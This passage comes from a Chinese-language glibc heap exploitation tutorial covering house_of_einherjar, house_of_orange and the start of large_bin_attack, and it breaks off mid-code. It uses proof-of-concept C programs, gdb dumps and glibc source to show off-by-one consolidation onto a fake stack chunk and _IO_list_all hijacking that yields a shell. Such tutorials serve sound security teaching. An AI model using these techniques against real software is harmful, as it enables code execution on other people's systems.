我们知道由于 tcache 的存在，malloc 从 unsorted bin 取 chunk 的时候，如果对应的 tcache bin 还未装满，则会将 unsorted bin 里的 chunk 全部放进对应的 tcache bin，然后再从 tcache bin 中取出。那么问题就来了，在放进 tcache bin 的这个过程中，malloc 会以为我们的 target address 也是一个 chunk，然而这个 "chunk" 是过不了检查的，将抛出 "memory corruption" 的错误：

      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
        {
          bck = victim->bk;
          if (__builtin_expect (chunksize_nomask (victim) <= 2 * SIZE_SZ, 0)
              || __builtin_expect (chunksize_nomask (victim)
                   > av->system_mem, 0))
            malloc_printerr ("malloc(): memory corruption");

那么要想跳过放 chunk 的这个过程，就需要对应 tcache bin 的 counts 域不小于 tcache_count（默认为7），但如果 counts 不为 0，说明 tcache bin 里是有 chunk 的，那么 malloc 的时候会直接从 tcache bin 里取出，于是就没有 unsorted bin 什么事了：

  if (tc_idx < mp_.tcache_bins
      /*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
      && tcache
      && tcache->entries[tc_idx] != NULL)
    {
      return tcache_get (tc_idx);
    }

这就造成了矛盾，所以我们需要找到一种既能从 unsorted bin 中取 chunk，又不会将 chunk 放进 tcache bin 的办法。

于是就得到了上面的利用 tcache poisoning（参考章节4.14），将 counts 修改成了 0xff，于是在进行到下面这里时就会进入 else 分支，直接取出 chunk 并返回：

#if USE_TCACHE
          /* Fill cache first, return to user only if cache fills.
         We may return one of these chunks later.  */
          if (tcache_nb
          && tcache->counts[tc_idx] < mp_.tcache_count)
        {
          tcache_put (victim, tc_idx);
          return_cached = 1;
          continue;
        }
          else
        {
#endif
              check_malloced_chunk (av, victim, nb);
              void *p = chunk2mem (victim);
              alloc_perturb (p, bytes);
              return p;

于是就成功泄露出了 unsorted bin 的头部地址。

house_of_einherjar

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>

int main() {
    uint8_t *a, *b, *d;

    a = (uint8_t*) malloc(0x10);
    int real_a_size = malloc_usable_size(a);
    memset(a, 'A', real_a_size);
    fprintf(stderr, "We allocate 0x10 bytes for 'a': %p\n\n", a);

    size_t fake_chunk[6];
    fake_chunk[0] = 0x80;
    fake_chunk[1] = 0x80;
    fake_chunk[2] = (size_t) fake_chunk;
    fake_chunk[3] = (size_t) fake_chunk;
    fake_chunk[4] = (size_t) fake_chunk;
    fake_chunk[5] = (size_t) fake_chunk;
    fprintf(stderr, "Our fake chunk at %p looks like:\n", fake_chunk);
    fprintf(stderr, "prev_size: %#lx\n", fake_chunk[0]);
    fprintf(stderr, "size: %#lx\n", fake_chunk[1]);
    fprintf(stderr, "fwd: %#lx\n", fake_chunk[2]);
    fprintf(stderr, "bck: %#lx\n", fake_chunk[3]);
    fprintf(stderr, "fwd_nextsize: %#lx\n", fake_chunk[4]);
    fprintf(stderr, "bck_nextsize: %#lx\n\n", fake_chunk[5]);

    b = (uint8_t*) malloc(0xf8);
    int real_b_size = malloc_usable_size(b);
    uint64_t* b_size_ptr = (uint64_t*)(b - 0x8);
    fprintf(stderr, "We allocate 0xf8 bytes for 'b': %p\n", b);
    fprintf(stderr, "b.size: %#lx\n", *b_size_ptr);
    fprintf(stderr, "We overflow 'a' with a single null byte into the metadata of 'b'\n");
    a[real_a_size] = 0;
    fprintf(stderr, "b.size: %#lx\n\n", *b_size_ptr);

    size_t fake_size = (size_t)((b-sizeof(size_t)*2) - (uint8_t*)fake_chunk);
    *(size_t*)&a[real_a_size-sizeof(size_t)] = fake_size;
    fprintf(stderr, "We write a fake prev_size to the last %lu bytes of a so that it will consolidate with our fake chunk\n", sizeof(size_t));
    fprintf(stderr, "Our fake prev_size will be %p - %p = %#lx\n\n", b-sizeof(size_t)*2, fake_chunk, fake_size);

    fake_chunk[1] = fake_size;
    fprintf(stderr, "Modify fake chunk's size to reflect b's new prev_size\n");

    fprintf(stderr, "Now we free b and this will consolidate with our fake chunk\n");
    free(b);
    fprintf(stderr, "Our fake chunk size is now %#lx (b.size + fake_prev_size)\n", fake_chunk[1]);

    d = malloc(0x10);
    memset(d, 'A', 0x10);
    fprintf(stderr, "\nNow we can call malloc() and it will begin in our fake chunk: %p\n", d);
}
$ gcc -g house_of_einherjar.c
$ ./a.out
We allocate 0x10 bytes for 'a': 0xb31010

Our fake chunk at 0x7ffdb337b7f0 looks like:
prev_size: 0x80
size: 0x80
fwd: 0x7ffdb337b7f0
bck: 0x7ffdb337b7f0
fwd_nextsize: 0x7ffdb337b7f0
bck_nextsize: 0x7ffdb337b7f0

We allocate 0xf8 bytes for 'b': 0xb31030
b.size: 0x101
We overflow 'a' with a single null byte into the metadata of 'b'
b.size: 0x100

We write a fake prev_size to the last 8 bytes of a so that it will consolidate with our fake chunk
Our fake prev_size will be 0xb31020 - 0x7ffdb337b7f0 = 0xffff80024d7b5830

Modify fake chunk's size to reflect b's new prev_size
Now we free b and this will consolidate with our fake chunk
Our fake chunk size is now 0xffff80024d7d6811 (b.size + fake_prev_size)

Now we can call malloc() and it will begin in our fake chunk: 0x7ffdb337b800

house-of-einherjar 是一种利用 malloc 来返回一个附近地址的任意指针。它要求有一个单字节溢出漏洞，覆盖掉 next chunk 的 size 字段并清除 PREV_IN_USE 标志，然后还需要覆盖 prev_size 字段为 fake chunk 的大小。当 next chunk 被释放时，它会发现前一个 chunk 被标记为空闲状态，然后尝试合并堆块。只要我们精心构造一个 fake chunk，让合并后的堆块范围到 fake chunk 处，那下一次 malloc 将返回我们想要的地址。比起前面所讲过的 poison-null-byte ，更加强大，但是要求的条件也更多一点，比如一个堆信息泄漏。

首先分配一个假设存在 off_by_one 溢出的 chunk a，然后在栈上创建我们的 fake chunk，chunk 大小随意，只要是 small chunk 就可以了：

gef➤  x/8gx a-0x10
0x603000:    0x0000000000000000    0x0000000000000021  <-- chunk a
0x603010:    0x4141414141414141    0x4141414141414141
0x603020:    0x4141414141414141    0x0000000000020fe1  <-- top chunk
0x603030:    0x0000000000000000    0x0000000000000000
gef➤  x/8gx &fake_chunk
0x7fffffffdcb0:    0x0000000000000080    0x0000000000000080  <-- fake chunk
0x7fffffffdcc0:    0x00007fffffffdcb0    0x00007fffffffdcb0
0x7fffffffdcd0:    0x00007fffffffdcb0    0x00007fffffffdcb0
0x7fffffffdce0:    0x00007fffffffddd0    0xffa7b97358729300

接下来创建 chunk b，并利用 chunk a 的溢出将 size 字段覆盖掉，清除了 PREV_INUSE 标志，chunk b 就会以为前一个 chunk 是一个 free chunk 了：

gef➤  x/8gx a-0x10
0x603000:    0x0000000000000000    0x0000000000000021  <-- chunk a
0x603010:    0x4141414141414141    0x4141414141414141
0x603020:    0x4141414141414141    0x0000000000000100  <-- chunk b
0x603030:    0x0000000000000000    0x0000000000000000

原本 chunk b 的 size 字段应该为 0x101，在这里我们选择 malloc(0xf8) 作为 chunk b 也是出于方便的目的，覆盖后只影响了标志位，没有影响到大小。

接下来根据 fake chunk 在栈上的位置修改 chunk b 的 prev_size 字段。计算方法是用 chunk b 的起始地址减去 fake chunk 的起始地址，同时为了绕过检查，还需要将 fake chunk 的 size 字段与 chunk b 的 prev_size 字段相匹配：

gef➤  x/8gx a-0x10
0x603000:    0x0000000000000000    0x0000000000000021  <-- chunk a
0x603010:    0x4141414141414141    0x4141414141414141
0x603020:    0xffff800000605370    0x0000000000000100  <-- chunk b <-- prev_size
0x603030:    0x0000000000000000    0x0000000000000000
gef➤  x/8gx &fake_chunk
0x7fffffffdcb0:    0x0000000000000080    0xffff800000605370  <-- fake chunk <-- size
0x7fffffffdcc0:    0x00007fffffffdcb0    0x00007fffffffdcb0
0x7fffffffdcd0:    0x00007fffffffdcb0    0x00007fffffffdcb0
0x7fffffffdce0:    0x00007fffffffddd0    0xadeb3936608e0600

释放 chunk b，这时因为 PREV_INUSE 为零，unlink 会根据 prev_size 去寻找上一个 free chunk，并将它和当前 chunk 合并。从 arena 里可以看到：

gef➤  heap arenas
Arena (base=0x7ffff7dd1b20, top=0x7fffffffdcb0, last_remainder=0x0, next=0x7ffff7dd1b20, next_free=0x0, system_mem=0x21000)

合并的过程在 poison-null-byte 那里也讲过了。

最后当我们再次 malloc，其返回的地址将是 fake chunk 的地址：

gef➤  x/8gx &fake_chunk
0x7fffffffdcb0:    0x0000000000000080    0x0000000000000021  <-- chunk d
0x7fffffffdcc0:    0x4141414141414141    0x4141414141414141
0x7fffffffdcd0:    0x00007fffffffdcb0    0xffff800000626331
0x7fffffffdce0:    0x00007fffffffddd0    0xbdf40e22ccf46c00

house_of_orange

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int winner (char *ptr);

int main() {
    char *p1, *p2;
    size_t io_list_all, *top;

    p1 = malloc(0x400 - 0x10);

    top = (size_t *) ((char *) p1 + 0x400 - 0x10);
    top[1] = 0xc01;

    p2 = malloc(0x1000);
    io_list_all = top[2] + 0x9a8;
    top[3] = io_list_all - 0x10;

    memcpy((char *) top, "/bin/sh\x00", 8);

    top[1] = 0x61;

    _IO_FILE *fp = (_IO_FILE *) top;
    fp->_mode = 0; // top+0xc0
    fp->_IO_write_base = (char *) 2; // top+0x20
    fp->_IO_write_ptr = (char *) 3; // top+0x28

    size_t *jump_table = &top[12]; // controlled memory
    jump_table[3] = (size_t) &winner;
    *(size_t *) ((size_t) fp + sizeof(_IO_FILE)) = (size_t) jump_table; // top+0xd8

    malloc(1);
    return 0;
}

int winner(char *ptr) {
    system(ptr);
    return 0;
}
$ gcc -g house_of_orange.c
$ ./a.out
*** Error in `./a.out': malloc(): memory corruption: 0x00007f3daece3520 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7f3dae9957e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x8213e)[0x7f3dae9a013e]
/lib/x86_64-linux-gnu/libc.so.6(__libc_malloc+0x54)[0x7f3dae9a2184]
./a.out[0x4006cc]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7f3dae93e830]
./a.out[0x400509]
======= Memory map: ========
00400000-00401000 r-xp 00000000 08:01 919342                             /home/firmy/how2heap/a.out
00600000-00601000 r--p 00000000 08:01 919342                             /home/firmy/how2heap/a.out
00601000-00602000 rw-p 00001000 08:01 919342                             /home/firmy/how2heap/a.out
01e81000-01ec4000 rw-p 00000000 00:00 0                                  [heap]
7f3da8000000-7f3da8021000 rw-p 00000000 00:00 0
7f3da8021000-7f3dac000000 ---p 00000000 00:00 0
7f3dae708000-7f3dae71e000 r-xp 00000000 08:01 398989                     /lib/x86_64-linux-gnu/libgcc_s.so.1
7f3dae71e000-7f3dae91d000 ---p 00016000 08:01 398989                     /lib/x86_64-linux-gnu/libgcc_s.so.1
7f3dae91d000-7f3dae91e000 rw-p 00015000 08:01 398989                     /lib/x86_64-linux-gnu/libgcc_s.so.1
7f3dae91e000-7f3daeade000 r-xp 00000000 08:01 436912                     /lib/x86_64-linux-gnu/libc-2.23.so
7f3daeade000-7f3daecde000 ---p 001c0000 08:01 436912                     /lib/x86_64-linux-gnu/libc-2.23.so
7f3daecde000-7f3daece2000 r--p 001c0000 08:01 436912                     /lib/x86_64-linux-gnu/libc-2.23.so
7f3daece2000-7f3daece4000 rw-p 001c4000 08:01 436912                     /lib/x86_64-linux-gnu/libc-2.23.so
7f3daece4000-7f3daece8000 rw-p 00000000 00:00 0
7f3daece8000-7f3daed0e000 r-xp 00000000 08:01 436908                     /lib/x86_64-linux-gnu/ld-2.23.so
7f3daeef4000-7f3daeef7000 rw-p 00000000 00:00 0
7f3daef0c000-7f3daef0d000 rw-p 00000000 00:00 0
7f3daef0d000-7f3daef0e000 r--p 00025000 08:01 436908                     /lib/x86_64-linux-gnu/ld-2.23.so
7f3daef0e000-7f3daef0f000 rw-p 00026000 08:01 436908                     /lib/x86_64-linux-gnu/ld-2.23.so
7f3daef0f000-7f3daef10000 rw-p 00000000 00:00 0
7ffe8eba6000-7ffe8ebc7000 rw-p 00000000 00:00 0                          [stack]
7ffe8ebee000-7ffe8ebf1000 r--p 00000000 00:00 0                          [vvar]
7ffe8ebf1000-7ffe8ebf3000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]
$ whoami
firmy
$ exit
Aborted (core dumped)

house-of-orange 是一种利用堆溢出修改 _IO_list_all 指针的利用方法。它要求能够泄漏堆和 libc。我们知道一开始的时候，整个堆都属于 top chunk，每次申请内存时，就从 top chunk 中划出请求大小的堆块返回给用户，于是 top chunk 就越来越小。

当某一次 top chunk 的剩余大小已经不能够满足请求时，就会调用函数 sysmalloc() 分配新内存，这时可能会发生两种情况，一种是直接扩充 top chunk，另一种是调用 mmap 分配一块新的 top chunk。具体调用哪一种方法是由申请大小决定的，为了能够使用前一种扩展 top chunk，需要请求小于阀值 mp_.mmap_threshold：

  if (av == NULL
      || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
      && (mp_.n_mmaps < mp_.n_mmaps_max)))
    {

同时，为了能够调用 sysmalloc() 中的 _int_free()，需要 top chunk 大于 MINSIZE，即 0x10：

                      if (old_size >= MINSIZE)
                        {
                          _int_free (av, old_top, 1);
                        }

当然，还得绕过下面两个限制条件：

  /*
     If not the first time through, we require old_size to be
     at least MINSIZE and to have prev_inuse set.
   */

  assert ((old_top == initial_top (av) && old_size == 0) ||
          ((unsigned long) (old_size) >= MINSIZE &&
           prev_inuse (old_top) &&
           ((unsigned long) old_end & (pagesize - 1)) == 0));

  /* Precondition: not enough current space to satisfy nb request */
  assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));

即满足 old_size 小于 nb+MINSIZE，PREV_INUSE 标志位为 1，old_top+old_size 页对齐这几个条件。

首先分配一个大小为 0x400 的 chunk：

gef➤  x/4gx p1-0x10
0x602000:    0x0000000000000000    0x0000000000000401  <-- chunk p1
0x602010:    0x0000000000000000    0x0000000000000000
gef➤  x/4gx p1-0x10+0x400
0x602400:    0x0000000000000000    0x0000000000020c01  <-- top chunk
0x602410:    0x0000000000000000    0x0000000000000000

默认情况下，top chunk 大小为 0x21000，减去 0x400，所以此时的大小为 0x20c00，另外 PREV_INUSE 被设置。

现在假设存在溢出漏洞，可以修改 top chunk 的数据，于是我们将 size 字段修改为 0xc01。这样就可以满足上面所说的条件：

gef➤  x/4gx p1-0x10+0x400
0x602400:    0x0000000000000000    0x0000000000000c01  <-- top chunk
0x602410:    0x0000000000000000    0x0000000000000000

紧接着，申请一块大内存，此时由于修改后的 top chunk size 不能满足需求，则调用 sysmalloc 的第一种方法扩充 top chunk，结果是在 old_top 后面新建了一个 top chunk 用来存放 new_top，然后将 old_top 释放，即被添加到了 unsorted bin 中：

gef➤  x/4gx p1-0x10+0x400
0x602400:    0x0000000000000000    0x0000000000000be1  <-- old top chunk [be freed]
0x602410:    0x00007ffff7dd1b78    0x00007ffff7dd1b78      <-- fd, bk pointer
gef➤  x/4gx p1-0x10+0x400+0xbe0
0x602fe0:    0x0000000000000be0    0x0000000000000010  <-- fencepost chunk 1
0x602ff0:    0x0000000000000000    0x0000000000000011  <-- fencepost chunk 2
gef➤  x/4gx p2-0x10
0x623000:    0x0000000000000000    0x0000000000001011  <-- chunk p2
0x623010:    0x0000000000000000    0x0000000000000000
gef➤  x/4gx p2-0x10+0x1010
0x624010:    0x0000000000000000    0x0000000000020ff1  <-- new top chunk
0x624020:    0x0000000000000000    0x0000000000000000
gef➤  heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x602400, bk=0x602400
 →   Chunk(addr=0x602410, size=0xbe0, flags=PREV_INUSE)

于是就泄漏出了 libc 地址。另外可以看到 old top chunk 被缩小了 0x20，缩小的空间被用于放置 fencepost chunk。此时的堆空间应该是这样的：

+---------------+
|       p1      |
+---------------+
|  old top-0x20 |
+---------------+
|  fencepost 1  |
+---------------+
|  fencepost 2  |
+---------------+
|      ...      |
+---------------+
|       p2      |
+---------------+
|    new top    |
+---------------+

详细过程如下：

                  if (old_size != 0)
                    {
                      /*
                         Shrink old_top to insert fenceposts, keeping size a
                         multiple of MALLOC_ALIGNMENT. We know there is at least
                         enough space in old_top to do this.
                       */
                      old_size = (old_size - 4 * SIZE_SZ) & ~MALLOC_ALIGN_MASK;
                      set_head (old_top, old_size | PREV_INUSE);

                      /*
                         Note that the following assignments completely overwrite
                         old_top when old_size was previously MINSIZE.  This is
                         intentional. We need the fencepost, even if old_top otherwise gets
                         lost.
                       */
                      chunk_at_offset (old_top, old_size)->size =
                        (2 * SIZE_SZ) | PREV_INUSE;

                      chunk_at_offset (old_top, old_size + 2 * SIZE_SZ)->size =
                        (2 * SIZE_SZ) | PREV_INUSE;

                      /* If possible, release the rest. */
                      if (old_size >= MINSIZE)
                        {
                          _int_free (av, old_top, 1);
                        }
                    }

根据放入 unsorted bin 中 old top chunk 的 fd/bk 指针，可以推算出 _IO_list_all 的地址。然后通过溢出将 old top 的 bk 改写为 _IO_list_all-0x10，这样在进行 unsorted bin attack 时，就会将 _IO_list_all 修改为 &unsorted_bin-0x10：

          /* remove from unsorted list */
          unsorted_chunks (av)->bk = bck;
          bck->fd = unsorted_chunks (av);
gef➤  x/4gx p1-0x10+0x400
0x602400:    0x0000000000000000    0x0000000000000be1
0x602410:    0x00007ffff7dd1b78    0x00007ffff7dd2510

这里讲一下 glibc 中的异常处理。一般在出现内存错误时，会调用函数 malloc_printerr() 打印出错信息，我们顺着代码一直跟踪下去：

static void
malloc_printerr (int action, const char *str, void *ptr, mstate ar_ptr)
{
  [...]
  if ((action & 5) == 5)
    __libc_message (action & 2, "%s\n", str);
  else if (action & 1)
    {
      char buf[2 * sizeof (uintptr_t) + 1];

      buf[sizeof (buf) - 1] = '\0';
      char *cp = _itoa_word ((uintptr_t) ptr, &buf[sizeof (buf) - 1], 16, 0);
      while (cp > buf)
        *--cp = '0';

      __libc_message (action & 2, "*** Error in `%s': %s: 0x%s ***\n",
                      __libc_argv[0] ? : "<unknown>", str, cp);
    }
  else if (action & 2)
    abort ();
}

调用 __libc_message：

// sysdeps/posix/libc_fatal.c
/* Abort with an error message.  */
void
__libc_message (int do_abort, const char *fmt, ...)
{
  [...]
  if (do_abort)
    {
      BEFORE_ABORT (do_abort, written, fd);

      /* Kill the application.  */
      abort ();
    }
}

do_abort 调用 fflush，即 _IO_flush_all_lockp：

// stdlib/abort.c
#define fflush(s) _IO_flush_all_lockp (0)

  if (stage == 1)
    {
      ++stage;
      fflush (NULL);
    }
// libio/genops.c
int
_IO_flush_all_lockp (int do_lock)
{
  int result = 0;
  struct _IO_FILE *fp;
  int last_stamp;

#ifdef _IO_MTSAFE_IO
  __libc_cleanup_region_start (do_lock, flush_cleanup, NULL);
  if (do_lock)
    _IO_lock_lock (list_all_lock);
#endif

  last_stamp = _IO_list_all_stamp;
  fp = (_IO_FILE *) _IO_list_all;   // 将其覆盖
  while (fp != NULL)
    {
      run_fp = fp;
      if (do_lock)
    _IO_flockfile (fp);

      if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
       || (_IO_vtable_offset (fp) == 0
           && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
                    > fp->_wide_data->_IO_write_base))
#endif
       )
      && _IO_OVERFLOW (fp, EOF) == EOF)     // 将其修改为 system 函数
    result = EOF;

      if (do_lock)
    _IO_funlockfile (fp);
      run_fp = NULL;

      if (last_stamp != _IO_list_all_stamp)
    {
      /* Something was added to the list.  Start all over again.  */
      fp = (_IO_FILE *) _IO_list_all;
      last_stamp = _IO_list_all_stamp;
    }
      else
    fp = fp->_chain;    // 指向我们指定的区域
    }

#ifdef _IO_MTSAFE_IO
  if (do_lock)
    _IO_lock_unlock (list_all_lock);
  __libc_cleanup_region_end (0);
#endif

  return result;
}

_IO_list_all 是一个 _IO_FILE_plus 类型的对象，我们的目的就是将 _IO_list_all 指针改写为一个伪造的指针，它的 _IO_OVERFLOW 指向 system，并且前 8 字节被设置为 '/bin/sh'，所以对 _IO_OVERFLOW(fp, EOF) 的调用最终会变成对 system('/bin/sh') 的调用。

// libio/libioP.h
/* We always allocate an extra word following an _IO_FILE.
   This contains a pointer to the function jump table used.
   This is for compatibility with C++ streambuf; the word can
   be used to smash to a pointer to a virtual function table. */

struct _IO_FILE_plus
{
  _IO_FILE file;
  const struct _IO_jump_t *vtable;
};

// libio/libio.h
struct _IO_FILE {
  int _flags;        /* High-order word is _IO_MAGIC; rest is flags. */
#define _IO_file_flags _flags

  /* The following pointers correspond to the C++ streambuf protocol. */
  /* Note:  Tk uses the _IO_read_ptr and _IO_read_end fields directly. */
  char* _IO_read_ptr;    /* Current read pointer */
  char* _IO_read_end;    /* End of get area. */
  char* _IO_read_base;    /* Start of putback+get area. */
  char* _IO_write_base;    /* Start of put area. */
  char* _IO_write_ptr;    /* Current put pointer. */
  char* _IO_write_end;    /* End of put area. */
  char* _IO_buf_base;    /* Start of reserve area. */
  char* _IO_buf_end;    /* End of reserve area. */
  /* The following fields are used to support backing up and undo. */
  char *_IO_save_base; /* Pointer to start of non-current get area. */
  char *_IO_backup_base;  /* Pointer to first valid character of backup area */
  char *_IO_save_end; /* Pointer to end of non-current get area. */

  struct _IO_marker *_markers;

  struct _IO_FILE *_chain;

  int _fileno;
#if 0
  int _blksize;
#else
  int _flags2;
#endif
  _IO_off_t _old_offset; /* This used to be _offset but it's too small.  */

#define __HAVE_COLUMN /* temporary */
  /* 1+column number of pbase(); 0 is unknown. */
  unsigned short _cur_column;
  signed char _vtable_offset;
  char _shortbuf[1];

  /*  char* _save_gptr;  char* _save_egptr; */

  _IO_lock_t *_lock;
#ifdef _IO_USE_OLD_IO_FILE
};

其中有一个指向函数跳转表的指针，_IO_jump_t 的结构如下：

// libio/libioP.h
struct _IO_jump_t
{
    JUMP_FIELD(size_t, __dummy);
    JUMP_FIELD(size_t, __dummy2);
    JUMP_FIELD(_IO_finish_t, __finish);
    JUMP_FIELD(_IO_overflow_t, __overflow);
    JUMP_FIELD(_IO_underflow_t, __underflow);
    JUMP_FIELD(_IO_underflow_t, __uflow);
    JUMP_FIELD(_IO_pbackfail_t, __pbackfail);
    /* showmany */
    JUMP_FIELD(_IO_xsputn_t, __xsputn);
    JUMP_FIELD(_IO_xsgetn_t, __xsgetn);
    JUMP_FIELD(_IO_seekoff_t, __seekoff);
    JUMP_FIELD(_IO_seekpos_t, __seekpos);
    JUMP_FIELD(_IO_setbuf_t, __setbuf);
    JUMP_FIELD(_IO_sync_t, __sync);
    JUMP_FIELD(_IO_doallocate_t, __doallocate);
    JUMP_FIELD(_IO_read_t, __read);
    JUMP_FIELD(_IO_write_t, __write);
    JUMP_FIELD(_IO_seek_t, __seek);
    JUMP_FIELD(_IO_close_t, __close);
    JUMP_FIELD(_IO_stat_t, __stat);
    JUMP_FIELD(_IO_showmanyc_t, __showmanyc);
    JUMP_FIELD(_IO_imbue_t, __imbue);
#if 0
    get_column;
    set_column;
#endif
};

伪造 _IO_jump_t 中的 __overflow 为 system 函数的地址，从而达到执行 shell 的目的。

当发生内存错误进入 _IO_flush_all_lockp 后，_IO_list_all 仍然指向 unsorted bin，这并不是一个我们能控制的地址。所以需要通过 fp->_chain 来将 fp 指向我们能控制的地方。所以将 size 字段设置为 0x61，因为此时 _IO_list_all 是 &unsorted_bin-0x10，偏移 0x60 位置上是 smallbins[5]。此时，如果触发一个不适合的 small chunk 分配，malloc 就会将 old top 从 unsorted bin 放回 smallbins[5] 中。而在 _IO_FILE 结构中，偏移 0x60 指向 struct _IO_marker *_markers，偏移 0x68 指向 struct _IO_FILE *_chain，这两个值正好是 old top 的起始地址。这样 fp 就指向了 old top，这是一个我们能够控制的地址。

在将 _IO_OVERFLOW 修改为 system 的时候，有一些条件检查：

      if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
       || (_IO_vtable_offset (fp) == 0
           && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
                    > fp->_wide_data->_IO_write_base))
#endif
       )
      && _IO_OVERFLOW (fp, EOF) == EOF)     // 需要修改为 system 函数
// libio/libio.h

  struct _IO_wide_data *_wide_data;

/* Extra data for wide character streams.  */
struct _IO_wide_data
{
  wchar_t *_IO_read_ptr;    /* Current read pointer */
  wchar_t *_IO_read_end;    /* End of get area. */
  wchar_t *_IO_read_base;    /* Start of putback+get area. */
  wchar_t *_IO_write_base;    /* Start of put area. */
  wchar_t *_IO_write_ptr;    /* Current put pointer. */
  wchar_t *_IO_write_end;    /* End of put area. */
  wchar_t *_IO_buf_base;    /* Start of reserve area. */
  wchar_t *_IO_buf_end;        /* End of reserve area. */
  /* The following fields are used to support backing up and undo. */
  wchar_t *_IO_save_base;    /* Pointer to start of non-current get area. */
  wchar_t *_IO_backup_base;    /* Pointer to first valid character of
                   backup area */
  wchar_t *_IO_save_end;    /* Pointer to end of non-current get area. */

  __mbstate_t _IO_state;
  __mbstate_t _IO_last_state;
  struct _IO_codecvt _codecvt;

  wchar_t _shortbuf[1];

  const struct _IO_jump_t *_wide_vtable;
};

所以这里我们设置 fp->_mode = 0，fp->_IO_write_base = (char *) 2 和 fp->_IO_write_ptr = (char *) 3，从而绕过检查。

然后，就是修改 _IO_jump_t，将其指向 winner：

gef➤  x/30gx p1-0x10+0x400
0x602400:    0x0068732f6e69622f    0x0000000000000061  <-- old top
0x602410:    0x00007ffff7dd1b78    0x00007ffff7dd2510      <-- bk points to io_list_all-0x10
0x602420:    0x0000000000000002    0x0000000000000003      <-- _IO_write_base, _IO_write_ptr
0x602430:    0x0000000000000000    0x0000000000000000
0x602440:    0x0000000000000000    0x0000000000000000
0x602450:    0x0000000000000000    0x0000000000000000
0x602460:    0x0000000000000000    0x0000000000000000
0x602470:    0x0000000000000000    0x00000000004006d3      <-- winner
0x602480:    0x0000000000000000    0x0000000000000000
0x602490:    0x0000000000000000    0x0000000000000000
0x6024a0:    0x0000000000000000    0x0000000000000000
0x6024b0:    0x0000000000000000    0x0000000000000000
0x6024c0:    0x0000000000000000    0x0000000000000000
0x6024d0:    0x0000000000000000    0x0000000000602460      <-- vtable
0x6024e0:    0x0000000000000000    0x0000000000000000
gef➤  p *((struct _IO_FILE_plus *) 0x602400)
$1 = {
  file = {
    _flags = 0x6e69622f,
    _IO_read_ptr = 0x61 <error: Cannot access memory at address 0x61>,
    _IO_read_end = 0x7ffff7dd1b78 <main_arena+88> "\020@b",
    _IO_read_base = 0x7ffff7dd2510 "",
    _IO_write_base = 0x2 <error: Cannot access memory at address 0x2>,
    _IO_write_ptr = 0x3 <error: Cannot access memory at address 0x3>,
    _IO_write_end = 0x0,
    _IO_buf_base = 0x0,
    _IO_buf_end = 0x0,
    _IO_save_base = 0x0,
    _IO_backup_base = 0x0,
    _IO_save_end = 0x0,
    _markers = 0x0,
    _chain = 0x0,
    _fileno = 0x0,
    _flags2 = 0x0,
    _old_offset = 0x4006d3,
    _cur_column = 0x0,
    _vtable_offset = 0x0,
    _shortbuf = "",
    _lock = 0x0,
    _offset = 0x0,
    _codecvt = 0x0,
    _wide_data = 0x0,
    _freeres_list = 0x0,
    _freeres_buf = 0x0,
    __pad5 = 0x0,
    _mode = 0x0,
    _unused2 = '\000' <repeats 19 times>
  },
  vtable = 0x602460
}

最后随意分配一个 chunk，由于 size<= 2*SIZE_SZ，所以会触发 _IO_flush_all_lockp 中的 _IO_OVERFLOW 函数，获得 shell。

  for (;; )
    {
      int iters = 0;
      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
        {
          bck = victim->bk;
          if (__builtin_expect (victim->size <= 2 * SIZE_SZ, 0)
              || __builtin_expect (victim->size > av->system_mem, 0))
            malloc_printerr (check_action, "malloc(): memory corruption",
                             chunk2mem (victim), av);
          size = chunksize (victim);

到此，how2heap 里全部的堆利用方法就全部讲完了。

3.1.9 Linux 堆利用（四）

下载文件

how2heap

large_bin_attack

#include<stdio.h>
#include<stdlib.h>

int main() {
    unsigned long stack_var1 = 0;
    unsigned long stack_var2 = 0;

    fprintf(stderr, "The targets we want to rewrite on stack:\n");
    fprintf(stderr, "stack_var1 (%p): %ld\n", &stack_var1, stack_var1);
    fprintf(stderr, "stack_var2 (%p): %ld\n\n", &stack_var2, stack_var2);

    unsigned long *p1 = malloc(0x100);
    fprintf(stderr, "Now, we allocate the first chunk: %p\n", p1 - 2);
    malloc(0x10);

    unsigned long *p2 = malloc(0x400);
    fprintf(stderr, "Then, we allocate the second chunk(large chunk): %p\n", p2 - 2);
    malloc(0x10);

    unsigned long *p3 = malloc(0x400);
    fprintf(stderr, "Finally, we allocate the third chunk(large chunk): %p\n\n", p3 - 2);
    malloc(0x10);

    // deal with tcache - libc-2.26
    // int *a[10], *b[10], i;
    // for (i = 0; i < 7; i++) {
    //     a[i] = malloc(0x100);
    //     b[i] = malloc(0x400);
    // }
    // for (i = 0; i < 7; i++) {
    //     free(a[i]);
    //     free(b[i]);
    // }

    free(p1);
    free(p2);
    fprintf(stderr, "Now, We free the first and the second chunks now and they will be inserted in the unsorted bin\n");

    malloc(0x30);
    fprintf(stderr, "Then, we allocate a chunk and the freed second chunk will be moved into large bin freelist\n\n");

    p2[-1] = 0x3f1;
    p2[0] = 0;
    p2[2] = 0;
    p2[1] = (unsigned long)(&stack_var1 - 2);
    p2[3] = (unsigned long)(&stack_var2 - 4);
    fprintf(stderr, "Now we use a vulnerability to overwrite the freed second chunk\n\n");

    free(p3);
    malloc(0x30);
    fprintf(stderr, "Finally, we free the third chunk and malloc again, targets should have already been rewritten:\n");
